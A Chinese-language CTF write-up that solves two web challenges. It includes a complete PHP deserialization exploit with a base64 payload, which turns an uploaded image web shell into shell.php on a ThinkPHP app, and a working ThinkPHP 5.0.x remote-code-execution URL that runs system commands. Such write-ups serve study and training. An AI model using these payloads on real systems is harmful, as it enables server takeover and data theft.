考完试才来看,贡献没多少。
队友们太强了。

仅仅做了web,就写下做出来的题吧,其它的就不放了。复现的后续添加。

Web

upload

注册登陆,发现文件上传,测试仅可上传图片,且只检测文件头。
随便找张图,在末尾添加shellcode,上传。
图片上传到了/upload/da5703ef349c8b4ca65880a05514ff89/目录。

扫描得到//www.tar.gz,得到源代码。

接下来审计源码,发现是用thinkphp实现的。
根据tp5的目录结构,审计tp5\application\web\controller下源码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
//Index.php

public function login_check(){
$profile=cookie('user');
if(!empty($profile)){
$this->profile=unserialize(base64_decode($profile));
$this->profile_db=db('user')->where("ID",intval($this->profile['ID']))->find();
if(array_diff($this->profile_db,$this->profile)==null){
return 1;
}else{
return 0;
}
}
}

存在反序列化。

寻找可利用的类。Register中存在__destruct()方法,调用this->checker->index()

1
2
3
4
5
6
7
8
//Register.php

public function __destruct()
{
if(!$this->registed){
$this->checker->index();
}
}

Profile类中存在__call()方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
//Profile.php

public function upload_img(){
if($this->checker){
if(!$this->checker->login_check()){
$curr_url="http://".$_SERVER['HTTP_HOST'].$_SERVER['SCRIPT_NAME']."/index";
$this->redirect($curr_url,302);
exit();
}
}
if(!empty($_FILES)){
$this->filename_tmp=$_FILES['upload_file']['tmp_name'];
$this->filename=md5($_FILES['upload_file']['name']).".png";
$this->ext_check();
}
if($this->ext) {
if(getimagesize($this->filename_tmp)) {
@copy($this->filename_tmp, $this->filename);
@unlink($this->filename_tmp);
$this->img="../upload/$this->upload_menu/$this->filename";
$this->update_img();
}else{
$this->error('Forbidden type!', url('../index'));
}
}else{
$this->error('Unknow file type!', url('../index'));
}
}

public function __call($name, $arguments)
{
if($this->{$name}){
$this->{$this->{$name}}($arguments);
}
}

__call()方法可以实现调用Profile类中的任意方法。其中upload_img方法,可以实现更改文件名及其后缀。需要将ext置为truechecker置为false即可触发。

利用思路:
反序列化Register,将其checker指向一个Profile对象,析构时,调用Profile的魔术方法__call(),利用其调用upload_img(),修改之前上传的图马的文件后缀,从而getshell。

EXP:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<?php
namespace app\web\controller;

class Register
{
public $checker;
public $registed;
}

class Profile
{
public $checker;
public $filename_tmp;
public $filename;
public $upload_menu;
public $ext;
public $img;
public $except;
public $index;
}

class Index
{
public $profile;
public $profile_db;
}

$obj = new Register();
$obj->checker = new Profile();
$obj->registed = false;

//刚才上传的图马
//http://117.78.28.89:31424/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png
$obj->checker->index = "upload_img";
$obj->checker->ext= true;
$obj->checker->upload_menu="da5703ef349c8b4ca65880a05514ff89";
//路径
$obj->checker->filename_tmp="../public/upload/da5703ef349c8b4ca65880a05514ff89/156005c5baf40ff51a327f1c34f2975b.png";
$obj->checker->filename="../public/upload/da5703ef349c8b4ca65880a05514ff89/shell.php";

$payload = base64_encode(serialize($obj));
echo $payload."\n";

//TzoyNzoiYXBwXHdlYlxjb250cm9sbGVyXFJlZ2lzdGVyIjoyOntzOjc6ImNoZWNrZXIiO086MjY6ImFwcFx3ZWJcY29udHJvbGxlclxQcm9maWxlIjo4OntzOjc6ImNoZWNrZXIiO047czoxMjoiZmlsZW5hbWVfdG1wIjtzOjU5OiIuLi9wdWJsaWMvdXBsb2FkL2RhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5L3NoZWxsLnBocCI7czo4OiJmaWxlbmFtZSI7czo2MToiLi4vcHVibGljL3VwbG9hZC9kYTU3MDNlZjM0OWM4YjRjYTY1ODgwYTA1NTE0ZmY4OS9qaW5nemhlLnBocCI7czoxMToidXBsb2FkX21lbnUiO3M6MzI6ImRhNTcwM2VmMzQ5YzhiNGNhNjU4ODBhMDU1MTRmZjg5IjtzOjM6ImV4dCI7YjoxO3M6MzoiaW1nIjtOO3M6NjoiZXhjZXB0IjtOO3M6NToiaW5kZXgiO3M6MTA6InVwbG9hZF9pbWciO31zOjg6InJlZ2lzdGVkIjtiOjA7fQ==

Antsword连一下,cat /flag.

Flag:

1
flag{ce5cb05ff4af0881a044f1d79f59ad2e}

强网先锋-上单

一看是thinkphp,并且暴露了版本号5.0.22,想起来去年tp爆出来的rce。

thinkphp5 RCE
https://paper.seebug.org/770/

payload:

1
http://117.78.28.89:32422/1/public/?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

Flag:

1
flag{9cdb595d4de827acde9b45bb120615d6}